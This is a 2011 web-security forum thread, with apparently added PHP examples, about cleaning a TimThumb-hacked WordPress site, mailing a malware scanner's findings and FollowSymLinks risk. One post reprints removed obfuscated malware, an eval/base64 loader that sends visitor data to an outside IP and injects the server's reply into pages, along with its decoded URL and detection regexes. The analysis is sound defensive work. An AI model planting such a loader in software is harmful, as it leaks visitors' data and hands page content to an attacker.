25 Years of Programming Community Forum
 81 
 on: September 24, 2011, 08:10:21 AM 
Started by randyg - Last post by SteveW
Since you're not accumulating text lines into $OutputText anymore, you'll need to test $PlainTextLines instead. Try changing

if(count($OutputText) > 1)
to
if(count($PlainTextLines) > 1)
   

 82 
 on: September 23, 2011, 10:48:17 AM 
Started by randyg - Last post by randyg
I keep getting a blank email message. Can you see if I edited it right, or maybe I did not understand something?

Thanks
Randy


//START FUNCTION

# ACCUMULATES ALL THE WARNING MESSAGES FOR THIS FILE.
//--------------------------------------------------------------- NEW
$PlainTextLines = array();
//--------------------------------------------------------------- NEW

# SEARCH THE FILE FOR EACH OF THE ABOVE SNIPPETS.
foreach($SuspiciousSnippets as $snippet)
{
    $matches = array();
    if($matchcount = preg_match_all($snippet, $file, $matches, PREG_PATTERN_ORDER | PREG_OFFSET_CAPTURE))
    {
        $i = 0;
        foreach($matches[0] as $occurrence)
        # $occurrence is an array itself 0=>string, 1=>offset
        {
            $i++;
            # THE 80 CHARACTERS AFTER START OF MATCH INSTANCE
            $s = substr($file, $occurrence[1], 80);
            $newline = (($i === 1) ? '<br><br>' : '<br>');
//---------------------------------------------------------------- NEW
            $PlainTextLines[] = "File matches regex... [the rest of your message]";
//--------------------------------------------------------------- NEW
        }
    }
}

# REPORT ALL THREAT MESSAGES AT ONCE, IF THERE WERE ANY.
# TO PRINT EVERY FILENAME EXAMINED, MAKE THE THRESHOLD 0.
//--------------------------------------------------------------- NEW
$msg = '';
if(count($PlainTextLines) > 1)
    $msg = implode("\n", $PlainTextLines);
//--------------------------------------------------------------- NEW
{
//--------------------------------------------------------------- NEW
    foreach($PlainTextLines as $s)
        $msg .= ($s . "\n");
//--------------------------------------------------------------- NEW
}

// END FUNCTION

/*********************** SEND THE RESULTS **********************/
$subject = "Report, ".$datestamp;
if ($email=="1") mail($email_address, $subject, $msg);
/*********************** SEND THE RESULTS **********************/

 83 
 on: September 22, 2011, 12:48:49 PM 
Started by randyg - Last post by randyg
Ok, let me give that a try tonight. Thanks.

I will either have two separate copies, one to read online normally and another from cron
just letting me know a match was found, etc., and that I should take a look,

or maybe when I pass .php?cron=1, send email, and .php?cron=0, just run normally (both using just one script).

But at least I have an idea on how to do this now.

Thank you so much for helping
Randy

 84 
 on: September 22, 2011, 12:25:03 PM 
Started by randyg - Last post by SteveW
Ok, I understand your situation better now.

What you want to do certainly seems possible. I even gave some thought to revising the script to make something like that easier (or to save the results to a disk file on the server, for example), but decided not to do that because it might encourage people to do things with the output text that they shouldn't. 

The key concept to the method you need is in FindMaliciousCodeSnippets(). These lines of code accumulate output lines into an array. Then at the end, all the lines are output at once using a loop:

I'd suggest that you create a separate array to do the same sort of thing for your plain text messages, except make that array global so you can add items to it from anywhere in the script.

# ACCUMULATES ALL THE WARNING MESSAGES FOR THIS FILE.
$OutputText = array(CleanColorText($filename, 'blue'));

# The above example starts the array off with one entry, the name of the file.
# For yours, you'd probably use this (an empty array) instead:

$PlainTextLines = array();


# SEARCH THE FILE FOR EACH OF THE ABOVE SNIPPETS.
foreach($SuspiciousSnippets as $snippet)
{
    $matches = array();
    if($matchcount = preg_match_all($snippet, $file, $matches, PREG_PATTERN_ORDER | PREG_OFFSET_CAPTURE))
    {
        $i = 0;
        foreach($matches[0] as $occurrence)
        # $occurrence is an array itself 0=>string, 1=>offset
        {
            $i++;
            # THE 80 CHARACTERS AFTER START OF MATCH INSTANCE
            $s = substr($file, $occurrence[1], 80);
            $newline = (($i === 1) ? '<br><br>' : '<br>');

            # This is where, instead of using echo to put the text on the page,
            # I push the text line into the array:
            $OutputText[] = $newline .
                            CleanColorText("Regex ($i of $matchcount): ", 'black') .
                            CleanColorText($snippet, 'red') .
                            CleanColorText(": " . $s, 'black');

            # You would probably do it more like this:
            $PlainTextLines[] = "File matches regex... [the rest of your message]";
        }
    }
}

# This is where all the messages are output to the page at once.

# REPORT ALL THREAT MESSAGES AT ONCE, IF THERE WERE ANY.
# TO PRINT EVERY FILENAME EXAMINED, MAKE THE THRESHOLD 0.
if(count($OutputText) > 1)
{
    foreach($OutputText as $s)
        echo $s;
    echo '<br><br>';
}

# Instead, when you're ready to send the email, you'd do something like this:
foreach($PlainTextLines as $s)
    $msg .= ($s . "\n");

# Or this might be equivalent:
$msg = implode("\n", $PlainTextLines);
	

   
   
Then send it.

mail(....);

I think that should work fine as long as all your text is safe for the email.

It would probably be best to create all your own output messages, and not try to use the same text that's being output with "echo", especially because all those are going through CleanColorText() anyway, which you don't want to do.

I hope that helps.

 85 
 on: September 22, 2011, 08:42:14 AM 
Started by randyg - Last post by randyg
I explain things a bit unclearly and sometimes come off as a newbie, but I'm not all that
new to PHP. I'm so anal I use PHPMailer with a backup SMTP, and clean all data, both inserted and
displayed, ten times to Sunday. I just posted those lines as a basic example; what I should have
done is just ask how to capture the info properly and efficiently into the email message.

I would never in a million years have sent myself the actual malicious code if found, just
the page it was found in and the type of match. A basic text email would handle that just fine.

This would be just another added convenience and safeguard to read in the morning. I could
also match returned results, as an example, and if found, fire off a text as well, AGAIN matching
regex only, not the code itself.

Getting the matching regex type and the path it's found in is the only thing that's holding me up.
That's why I asked.

Thanks
Randy


 86 
 on: September 22, 2011, 05:58:20 AM 
Started by robbeh - Last post by SteveW
Yes, the code that you added with your edit was bad.  You did the right thing by removing it from the file. 

There are several ways that your requests could be getting redirected.

A useful tool for diagnosing these is the "Live HTTP Headers" Firefox add-on. It will show you in real time whether your requests are being redirected by your server. Firefox also gives you the option of turning JavaScript off.  If you are redirected when JavaScript is on, but not when it is off, then the place to look for redirect code is in JavaScript from your site, either on pages or in separate .js files. (If you don't already have Firefox, I do recommend it even if you only use it for this purpose. Get FF and its NoScript add-on, and then "Live HTTP Headers".)

Sections 12) to 14) at http://25yearsofprogramming.com/blog/20071223.htm describe some of the redirect methods and show examples of suspicious code for each.

First, find all the .htaccess files in your site and visually inspect each one for rewrite rules that mention any of the sites you're being redirected to (or any sites other than yours). 

It sounds like you've not yet found all the bad code that was installed by the hack.

I'm not specifically familiar with this TimThumb hack, but it sounds like you've done a good job of finding people who are. A web search shows that a lot has been written about it. 

Make sure that your WordPress is upgraded to latest version, and either remove or update your theme that uses the timthumb code, or upgrade timthumb itself to the newest version. Some articles say that there can be multiple instances of timthumb in a site; in that case it's necessary to upgrade all of them.

Here are some useful references if you haven't already discovered them:

http://redleg-redleg.blogspot.com/2011/08/malware-hosted-newportalsecom.html

Sort of rambling, but mentions many filenames to inspect, etc, and mentions clearing browser cache and deleting the cookies that have been set by your site:
http://wordpress.org/support/topic/iframe-hack-3 (the thread spans 2 pages)
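The .htaccess inspection the reply recommends can be scripted. The following is an added example, not code from the post or from the site's own scanner: it flags any RewriteRule, Redirect or ErrorDocument line that names a host other than your own, and any RewriteCond keyed on the referer or user agent, which is how redirects that only fire for visitors arriving from a search engine are usually triggered. The sample .htaccess text and the host name example.com are constructed; scan_htaccess_tree() is for a real document root and is not run in the demo.

```php
<?php
// Added example, not from the post above: flag .htaccess directives that send
// visitors to a host other than your own. Sample rules and host are constructed.

/** True if $host is $own or a subdomain of it (both already lower-cased). */
function is_own_host(string $host, string $own): bool
{
    $suffix = '.' . $own;
    return $host === $own
        || (strlen($host) > strlen($suffix) && substr($host, -strlen($suffix)) === $suffix);
}

/**
 * Lines of one .htaccess that rewrite or redirect to a foreign host, plus
 * RewriteCond lines that test the referer or user agent.
 */
function foreign_redirect_lines(string $htaccess, string $ownHost): array
{
    $flagged = [];
    $own = strtolower($ownHost);
    foreach (preg_split('/\R/', $htaccess) as $idx => $line) {
        $text = trim($line);
        if ($text === '' || $text[0] === '#') {
            continue;
        }
        if (preg_match('/^RewriteCond\s+%\{HTTP_(REFERER|USER_AGENT)\}/i', $text)) {
            $flagged[] = ['line' => $idx + 1, 'why' => 'conditional on referer/user agent', 'text' => $text];
            continue;
        }
        if (!preg_match('/^(RewriteRule|Redirect(Match|Permanent|Temp)?|ErrorDocument)\b/i', $text)) {
            continue;
        }
        // Any absolute URL on the line whose host is not ours.
        if (preg_match_all('~https?://([^/\s"\'\]]+)~i', $text, $m)) {
            foreach ($m[1] as $host) {
                $host = strtolower(preg_replace('/:\d+$/', '', $host));
                if (!is_own_host($host, $own)) {
                    $flagged[] = ['line' => $idx + 1, 'why' => "sends visitors to $host", 'text' => $text];
                    break;
                }
            }
        }
    }
    return $flagged;
}

/** Walk a site tree and run the check on every .htaccess found. */
function scan_htaccess_tree(string $root, string $ownHost): array
{
    $results = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $entry) {
        if ($entry->isFile() && $entry->getFilename() === '.htaccess') {
            $hits = foreign_redirect_lines(file_get_contents($entry->getPathname()), $ownHost);
            if ($hits) {
                $results[$entry->getPathname()] = $hits;
            }
        }
    }
    return $results;
}

// Constructed sample: two legitimate rules, then the kind of lines a hack adds.
$sample = <<<'HT'
RewriteEngine On
RewriteRule ^index\.php$ - [L]
RewriteRule ^old/(.*)$ https://www.example.com/new/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\. [NC]
RewriteRule ^(.*)$ http://some-other-host.invalid/in.php?q=$1 [R,L]
ErrorDocument 404 http://another-host.invalid/404.php
HT;

foreach (foreign_redirect_lines($sample, 'example.com') as $hit) {
    printf("line %d: %s\n    %s\n", $hit['line'], $hit['why'], $hit['text']);
}
// Real site: print_r(scan_htaccess_tree('/path/to/public_html', 'example.com'));
```

The redirect to www.example.com is left alone because it stays on your own domain; the three lines after it are reported. A clean result from this script only covers .htaccess: the redirect code can equally sit in PHP, in a theme's JavaScript or in the database, which is what the Live HTTP Headers and JavaScript-off tests above are for.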

 87 
 on: September 22, 2011, 03:26:30 AM 
Started by SteveW - Last post by SteveW
I don't know, so I had to research it.

It looks like maybe it could be a danger after a site gets hacked, if the hacker, during the hack, is able to create symlinks to files that they want to access even after you clean up and secure the site. Those symlinks could give them access to areas they're not supposed to be able to reach. But that doesn't mean they make the site hackable; in that scenario, it only matters after they've done the hack.

Other than that, it doesn't appear to me that it's much of a risk, if any, especially since the feature is enabled by default on virtually all shared hosting accounts.  The reason is that mod_rewrite (RewriteEngine On, RewriteCond, RewriteRule) only works when FollowSymLinks is enabled. Many or most websites, including Joomla ones, use the RewriteEngine commands, so FollowSymLinks is basically a necessity, whether it's any risk or not.

I wouldn't worry about it.
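Checking for the leftover the reply describes, symlinks planted during a compromise that point outside the site, is easy to script. This is an added example, not code from the post: it walks a document root, reports every symlink whose resolved target lies outside it, and never follows a link while walking, so a link to / cannot drag the scan across the whole server. The demo tree is constructed by the script itself in a temporary directory and removed afterwards.

```php
<?php
// Added example, not part of the post above: list the symlinks under a document
// root that resolve to somewhere outside it. Demo tree is constructed below.

function find_escaping_symlinks(string $docroot): array
{
    $rootReal = realpath($docroot);
    if ($rootReal === false) {
        throw new RuntimeException("not a directory: $docroot");
    }
    $findings = [];
    // Without FOLLOW_SYMLINKS the iterator yields a linked directory as a leaf
    // and never descends into it.
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($docroot, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $entry) {
        if (!$entry->isLink()) {
            continue;
        }
        $real   = $entry->getRealPath();   // fully resolved target, false if dangling
        $inside = $real !== false
            && ($real === $rootReal || strpos($real, $rootReal . DIRECTORY_SEPARATOR) === 0);
        if (!$inside) {
            $findings[] = [
                'link'   => $entry->getPathname(),
                'target' => $entry->getLinkTarget(),   // the link text as written
                'real'   => $real === false ? '(dangling)' : $real,
            ];
        }
    }
    return $findings;
}

// Constructed demo: docroot/img -> images (stays inside, fine),
//                   docroot/cfg -> ../outside/secret.txt (escapes, flagged)
$tmp = sys_get_temp_dir() . '/symlink_demo_' . getmypid();
mkdir("$tmp/docroot/images", 0700, true);
mkdir("$tmp/outside", 0700, true);
file_put_contents("$tmp/docroot/index.php", "<?php\n");
file_put_contents("$tmp/outside/secret.txt", "not for the web\n");
symlink('images', "$tmp/docroot/img");
symlink('../outside/secret.txt', "$tmp/docroot/cfg");

foreach (find_escaping_symlinks("$tmp/docroot") as $f) {
    printf("%s -> %s (resolves to %s)\n", $f['link'], $f['target'], $f['real']);
}

// Remove the demo tree again.
foreach (["$tmp/docroot/cfg", "$tmp/docroot/img", "$tmp/docroot/index.php", "$tmp/outside/secret.txt"] as $p) {
    unlink($p);
}
foreach (["$tmp/docroot/images", "$tmp/docroot", "$tmp/outside", $tmp] as $d) {
    rmdir($d);
}
```

Only the cfg link is reported. On a shared host, Apache's `Options SymLinksIfOwnerMatch` narrows the exposure independently of any scan: a link is followed only when it and its target belong to the same owner.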

 88 
 on: September 22, 2011, 02:41:20 AM 
Started by randyg - Last post by SteveW
The text that the script outputs is HTML intended for display on a web page, and it is sanitized so that suspected malicious snippets can be displayed on the page without having a malicious effect. 

As described at http://www.php.net/manual/en/function.mail.php , sending an email can be somewhat complicated. In a plain text email, any line longer than 70 characters must be cut up into sections. Most of the lines from the script are longer than 70 characters. 

In addition, if you send the email to yourself as plain text, it will be full of HTML tags and HTML entities (such as < being represented as &lt;), so the result will be very cluttered or even look like garbage. If you try to process the text to make the garbage readable, you can make the malicious code malicious again, and you could end up sending yourself a dangerous email.

On the other hand, sending the e-mail to yourself as HTML has its own set of complications, which you can read about in the link above.

The script outputs all its text to the page with the PHP "echo" command. In order to send the output in an email, you would have to change all the "echo" statements so that the output is instead accumulated into a global array of text lines. When finished, you would concatenate all those lines into your $msg variable.

I do not recommend doing that. It might work fine as long as the report only contains harmless text and false positives, but if it ever finds a real threat, the email you send yourself could be dangerous.

The script is intended as a tool to use on a site that has already been hacked, to help locate malicious text and determine the extent of the damage. If you're trying to use it for ongoing monitoring, it's a lot more important to protect the site so it doesn't get hacked than to monitor it for "when" it does get hacked.

If this is the first time you've attempted to use the mail() function, it would be a lot safer to practice with it on some more trivial applications first than to dive into it with this potentially hazardous one.
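The following is an added example that covers both SteveW's array-and-implode sketch (the September 22, 12:25 post above) and the cautions in this post; it is not the original script. Each finding records only the file name, pattern number, match index and byte offset, never the matched text, so nothing the scanner finds can end up in the mail; every body line is wrapped at 70 characters as the PHP manual asks; and the recipient and subject are fixed strings. Because the plain-text array starts empty, the send threshold here is a count above 0 (the HTML array in the original starts with the file name, hence its threshold of 1). The patterns, file contents and address are constructed; a `cron` command-line argument stands in for randyg's `?cron=1` idea and assumes the script is run by cron with the PHP CLI; mail() needs a working local MTA.

```php
<?php
// Added example, not the original scanner: accumulate plain-text findings
// while scanning, then build a mail body that names the file, which pattern
// matched and where, but never includes the matched code itself.

$SuspiciousSnippets = [                     // constructed sample patterns
    '/eval\s*\(\s*base64_decode\s*\(/i',
    '/\bedoced_46esab\b/',                  // base64_decode spelled backwards
    '/<iframe[^>]*\bdisplay\s*:\s*none/i',
];

/**
 * One plain-text line per match: file, pattern number, which match of how
 * many, byte offset. The matched string ($occurrence[0]) is deliberately unused.
 */
function scan_file_for_report(string $filename, string $contents, array $snippets): array
{
    $lines = [];
    foreach ($snippets as $n => $snippet) {
        $matches = [];
        $matchcount = preg_match_all($snippet, $contents, $matches, PREG_PATTERN_ORDER | PREG_OFFSET_CAPTURE);
        if (!$matchcount) {
            continue;
        }
        foreach ($matches[0] as $i => $occurrence) {   // [matched string, offset]
            $lines[] = sprintf('%s: pattern #%d, match %d of %d, at byte %d',
                $filename, $n, $i + 1, $matchcount, $occurrence[1]);
        }
    }
    return $lines;
}

/** Plain-text body: no HTML, no line over 70 characters, no stray CR/LF. */
function build_mail_body(array $plainTextLines, string $datestamp): string
{
    $body = "Suspicious-code report, $datestamp\n\n";
    if (count($plainTextLines) === 0) {
        return $body . "No matches.\n";
    }
    foreach ($plainTextLines as $line) {
        $line  = str_replace(["\r", "\n"], ' ', $line);
        $body .= wordwrap($line, 70, "\n", true) . "\n";
    }
    return $body;
}

// Constructed stand-ins for files read from the site; a real run would walk
// the document root and pass each file's contents.
$files = [
    'wp-content/themes/demo/footer.php' => "<?php\n eval(base64_decode('aGVsbG8='));\n",
    'index.php'                         => "<?php\n echo 'clean';\n",
];

$PlainTextLines = [];
foreach ($files as $name => $contents) {
    $PlainTextLines = array_merge($PlainTextLines,
        scan_file_for_report($name, $contents, $SuspiciousSnippets));
}

$msg = build_mail_body($PlainTextLines, date('Y-m-d H:i'));
echo $msg;

// Cron mode (php scan.php cron): recipient and subject are fixed strings, never
// taken from the request or from file contents, so the headers stay clean.
if (PHP_SAPI === 'cli' && ($argv[1] ?? '') === 'cron' && count($PlainTextLines) > 0) {
    mail('admin@example.com', 'Scan report ' . date('Y-m-d'), $msg);
}
```

Run interactively it prints the report for the two constructed files (one line for footer.php, nothing for index.php); run as `php scan.php cron` it also sends that report. If you later want the 80 characters of context in the mail, put them through something like htmlspecialchars() and send an HTML message, not plain text, for the reasons given above.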

 89 
 on: September 21, 2011, 11:40:57 PM 
Started by robbeh - Last post by robbeh
To whoever is lucky enough to read through my problem :)

I have to say this site has been quite informative!  I've digested a few Website security articles and have to say they were exactly what I was looking for.  But my problem still persists!

I had a few websites running WordPress which had certain themes installed using the TimThumb script (used to format images, from what I hear).  In August there was a nice vulnerability in the script and thousands of sites got "hacked" or were compromised, including mine :)!

So I went through as many articles as I could, and I have decided to seek some friendly forum help.

What I found was some malicious code in the "l10n.js" file (bunch of numbers and what not).  I cleaned up the file (basically used a fresh Wordpress download l10n.js file to compare and clean).
I also went through any files that were different in size compared to the default Wordpress install.  Anything that was different I opened up and did my best to scan through the code.

In the wp-settings.php file I noticed some weird code near the bottom of the file (bunch of letters, numbers, symbols, wish I had saved it), so I deleted it out. Seems to have done no harm.

All scans come up clean, Google has not flagged the site (only one of my shared hosting sites was flagged and I deleted it because I really didn't need it).  3 sites came up infected with the Sucuri scan initially but all come up clean now.

The Problem:

What I am noticing is every so often when I visit one of the three sites, I am redirected to the Yahoo Associated Content site automatically, and sometimes I'm redirected a bunch of times (every half second) to all these different sites.

I don't know where to look for the problem and any advice would be helpful!

Thanks a bunch,
Robb
P.S. I also did a scan with the script on your site... I don't really know what to look for in the results (or what should flag me), any help here would be much appreciated!

Edit: I found the code I deleted from the wp-settings.php file.  After reading all those articles, I think I did the right thing.

function counter_wordpress() {$_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTI zNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1 IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 2);$re = curl_exec($ch);curl_close($ch);echo $re;}add_action('wp_head', 'counter_wordpress');
do_action( 'init' );
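The two base64 strings in the deleted snippet can be read without running any of it. The following is an added example, not from the post: it applies base64_decode() and the malware's own strtr() key to the two strings, and never calls eval(). The strings are copied from the posted code with the line-wrap spaces removed; the function also strips whitespace itself in case a copy still contains some.

```php
<?php
// Added example, not from the post above: peel the two obfuscation layers of
// the counter_wordpress() snippet statically. Only base64_decode() and strtr()
// are used; the eval() the malware relies on is never called.

/** Decode one layer. $vowelSwap applies the malware's own strtr() key. */
function unpack_layer(string $b64, bool $vowelSwap): string
{
    $clean = preg_replace('/\s+/', '', $b64);        // forum copies carry line-wrap spaces
    $plain = base64_decode($clean, true);
    if ($plain === false) {
        throw new InvalidArgumentException('not valid base64');
    }
    // Stage 1 runs strtr($_X, '123456aouie', 'aouie123456') on stage 2 before
    // evaluating it: digits 1-5 become vowels, vowels become digits.
    return $vowelSwap ? strtr($plain, '123456aouie', 'aouie123456') : $plain;
}

// The argument of eval(base64_decode(...)) in the posted code.
$stage1 = 'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7'
        . 'JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==';
// The $_X string that stage 1 decodes, transliterates and evaluates.
$stage2 = 'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';

echo "Stage 1 (what eval() runs first):\n";
echo unpack_layer($stage1, false), "\n\n";
echo "Stage 2 (what stage 1 evaluates, after its strtr()):\n";
echo unpack_layer($stage2, true), "\n";
```

Stage 1 decodes to a generic unpacker: base64-decode $_X, transliterate it with the key above, substitute the file name for __FILE__, eval the result. Stage 2 decodes to `?><?php $3rl = 'http://96.69e.a6e.o0/bt.php'; ?>` and, after the transliteration, to `?><?php $url = 'http://91.196.216.30/bt.php'; ?>` (the leading `?>` only lets the string open a fresh PHP block inside eval()). That is the `$url` the rest of the posted function extends with the visitor's IP, host, URI, user agent and referer, fetches with a two-second cURL timeout, and echoes into every page through the `wp_head` hook. Whatever that server returns is injected into the page, so what a visitor sees is decided remotely and can change from one visit to the next.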
 

 90 
 on: September 21, 2011, 08:27:58 PM 
Started by SteveW - Last post by giovanni.ece
Is there any danger in using the "FollowSymLinks" command present in the .htaccess for Joomla websites? Could it maybe act as a vulnerability to be exploited by hackers?
